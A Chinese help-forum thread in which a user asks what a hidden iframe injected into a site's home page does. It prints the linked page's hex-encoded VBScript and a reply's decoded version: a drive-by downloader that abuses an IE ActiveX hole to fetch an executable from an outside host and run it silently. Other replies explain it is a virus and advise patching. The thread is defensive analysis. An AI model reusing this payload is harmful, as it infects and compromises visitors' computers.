高分求JS高手帮我分析这段代码.

网站首页嵌套了一个<iframe src=http://fs18.net/down8/dd.htm width=20 height=0 frameborder=0></iframe>我把页面http://fs18.net/down8/dd.htm下载下来后是下面的代码,请高手帮我分析下啊!<html>
<body>
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language="VBScript">
flag_type="vbs"
S="6f6E206572726F7220726573756d65206E6578740D0a6375726c3D22687474703A2F2f667331382E6E65742F646f776E382f"
S=S+"69692e657865220D0a666E616D65313D2269692e657865220D0a666e616d65323d2269692e766273220d0a53657420646620"
S=S+"3D20646F63756D656E742E637265617465456C656d656E7428226F626A65637422290D0a64662e7365744174747269627574"
S=S+"652022636c6173736964222C2022636C7369643A42443936433535362D363541332D313144302d393833412d303043303446"
S=S+"433239453336220D0a7374723D224D6963726f736F66742e584d4c48545450220d0a5365742078203d2064662e4372656174"
S=S+"654F626A656374287374722C2222290D0A43313D2241646f220D0A43323d2264622e220D0A43333D22737472220D0A43343D"
S=S+"2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0a7365742053203d2064662E637265"
S=S+"6174656f626A65637428737472352c2222290D0a532e74797065203d20310D0A737472363D22474554220d0a782e4F70656e"
S=S+"20737472362C206375726c2C2046616C73650D0a782E53656E640d0a73313d22536372697074220d0a73323d22696E672E22"
S=S+"0d0a73333D2246696C65220D0a73343d2253797374656D4F626a656374220d0a73303D73312B73322b73332B73340d0a7365"
S=S+"742046203D2064662E6372656174656f626a6563742873302C2222290d0a73657420746d70203d20462e4765745370656369"
S=S+"616C466F6c6465722832290D0a666E616d65313d20462e4275696c645061746828746D702c666E616D6531290D0a532e6f70"
S=S+"656E0D0A532e777269746520782e726573706F6e7365426F64790D0A532e73617665746f66696c6520666E616d65312C320d"
S=S+"0A532E636C6f73650D0A666e616d65323D20462E4275696C645061746828746D702C666e616d6532290D0A53657420747320"
S=S+"3d20462E4f70656e5465787446696c6528666e616D65322C20322C2054727565290d0A74732E57726974654C696E65202253"
S=S+"6574205368656c6C203D204372656174654f626A656374282222577363726970742E5368656c6C222229220d0A73716C3D22"
S=S+"5368656c6C2e52756E282222222b666e616d65312B22222229220D0A74732e57726974654c696E652073716c0d0A74732E57"
S=S+"726974654C696e652022736574205368656c6C3D4e6F7468696E67220D0a74732E57726974654c696E652022693d31220d0a"
S=S+"74732e636C6f73650d0a696620462e46696C6545786973747328666E616D6531293d74727565207468656e0d0a696620462E"
S=S+"46696C6545786973747328666E616d6532293d74727565207468656E0d0a202020207368613D225368656C6c2e417070220D"
S=S+"0a202020207368623D7368610d0A202020207365742051203D2064662E6372656174656f626a656374287368622b226c6963"
S=S+"6174696f6e222c2222290D0A20202020512e5368656c6c4578656375746520666E616d65322c22222c22222c226F70656e22"
S=S+"2c300D0A656E642069660d0a656e642069660D0a"
D=""
DO WHILE LEN(S)>1
    k="&H"+ucase(LEFT(S,2))
    p=CLng(k)
    m=chr(p)
    D=D+m
    S=mymid(S)
LOOP
if flag_type="vbs" then
  EXECUTE D
end if
if flag_type="html" then
  document.write(D)
end if
</script>
<script language="javaScript">
if (flag_type=="js") {
eval(D);}
</script>
</body>
</html>
<DIV style="CURSOR: url(ah.c)"></DIV>
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<script src='http://s128.cnzz.com/stat.php?id=620367&web_id=620367' language='JavaScript' charset='gb2312'></script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

解决方案 »

免费领取超大流量手机卡，每月29元包185G流量+100分钟通话, 中国电信官方发货

on error resume next curl="http://fs18.net/down8/ii.exe" fname1="ii.exe" fname2="ii.vbs" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") C1="Ado" C2="db." C3="str" C4="eam" str1=C1&C2&C3&C4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, curl, False x.Send s1="Script" s2="ing." s3="File" s4="SystemObject" s0=s1+s2+s3+s4 set F = df.createobject(s0,"") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close fname2= F.BuildPath(tmp,fname2) Set ts = F.OpenTextFile(fname2, 2, True) ts.WriteLine "Set Shell = CreateObject(""Wscript.Shell"")" sql="Shell.Run("""+fname1+""")" ts.WriteLine sql ts.WriteLine "set Shell=Nothing" ts.WriteLine "i=1" ts.close if F.FileExists(fname1)=true then if F.FileExists(fname2)=true then sha="Shell.App" shb=sha set Q = df.createobject(shb+"lication","") Q.ShellExecute fname2,"","","open",0 end if end if
js调用 vbs的东西吧这年头都用 firefox了  vbs也就没法用了
是病毒，利用ie漏洞
前面s是病毒体的二进制代码
D是解码后的病毒
这句
EXECUTE D
执行
你要看具体是服务器端页面本身带毒，还是通过诸如arp欺骗方式注入病毒
如果是服务器端本身，只有不去访问它或在你的网络出口加病毒网关防御，也可以试试打补丁的办法
如果是arp欺骗，先找到哪台感染arp病毒
总之补丁是不能不打。